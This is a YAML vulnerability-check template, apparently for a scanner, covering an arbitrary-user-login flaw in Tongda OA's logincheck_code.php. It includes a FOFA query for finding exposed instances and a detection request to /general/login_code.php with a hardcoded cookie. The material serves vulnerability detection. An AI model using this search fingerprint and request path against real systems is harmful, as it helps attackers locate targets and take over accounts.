product: 通达OA
vName: 通达OA logincheck_code.php任意用户登录
type: 访问控制
vID: [ ]
level: 2
vDesc: 在 logincheck_code.php 文件，变量 UID 为攻击者可控，攻击者可改变 UID 参数，从而控制该 SQL 语句返回 USER 表中指定
  uid参数的用户信息，便可通过伪造参数来达到登录任意用户的目的。
version: 通达OA2017；11.X<11.5版本
note: ''
search:
  FOFA: app="TDXK-通达OA"
protocol: http
link: https://www.cnblogs.com/bink1/p/13328579.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /general/login_code.php
      cookie: PHPSESSID=4mn1na0ssj3keqcp4jkaac1k42; KEY_RANDOMDATA=16921
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - code_uid
              - status
            logic: and